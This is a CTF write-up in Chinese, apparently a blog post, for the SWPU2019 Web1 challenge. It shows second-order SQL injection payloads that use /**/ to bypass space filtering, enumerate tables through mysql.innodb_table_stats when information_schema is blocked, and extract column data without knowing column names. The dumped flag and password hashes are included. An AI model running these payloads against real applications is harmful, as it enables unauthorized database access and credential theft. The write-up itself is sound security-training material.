BUUCTF-WEB 【SWPU2019】Web1 1

发表于 更新于 分类于 阅读次数: 评论数:

考点:无information_schema表注入

二次注入

流程

注册->登录->发布广告->查看广告

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
1'/**/group/**/by/**/22,'1

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

-1'/**/union/**/select/**/1,database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

web1	root@localhost

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
ads,users

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
3,flag{fdc63c44-aae2-43da-9890-38992f50d843},53e217ad4c721eb9565cf25a5ec3b66e,098f6bcd4621d373cade4e832627b4f6,202cb962ac59075b964b07152d234b70


select group_concat(b) from (select 1,2,3 as b union select * from users)a

学到了两种新姿势

information_schemab.tables 被过滤

1
information_schemab.tables  替代表 mysql.innodb_table_statstable_schema 换成 database_name

只知道表名的情况下查询数据

1
(select `2` from (select 1,2,3 union select * from table_name)a) //前提是要知道表名((select c from (select 1,2,3 as c union select * from users)b)) 123是因为users表有三列,实际情况还需要猜测表的列的数量